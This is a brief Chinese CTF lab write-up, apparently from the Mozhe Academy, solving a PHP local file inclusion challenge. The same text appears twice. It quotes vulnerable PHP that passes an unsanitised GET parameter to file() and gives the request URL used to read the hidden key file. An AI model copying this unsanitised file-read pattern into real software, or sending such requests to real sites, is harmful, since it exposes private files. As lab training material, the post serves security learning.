墨者学院 - PHP本地包含漏洞代码溯源
2018-09-25 本文已影响0人
这是什么娃哈哈
根据本题解题方向,查看源码得知
< ?php
$p=($_get["p"].".txt");
$pics=file($p);
for($i=0;$i< count($pics);$i++)
{
echo $pics[$i];
}
?>
说明密码存在the_key_is_here,输入http://xxx/r.php?p=/the_key_is_here,即可获取key
根据本题解题方向,查看源码得知
< ?php
$p=($_get["p"].".txt");
$pics=file($p);
for($i=0;$i< count($pics);$i++)
{
echo $pics[$i];
}
?>
说明密码存在the_key_is_here,输入http://xxx/r.php?p=/the_key_is_here,即可获取key
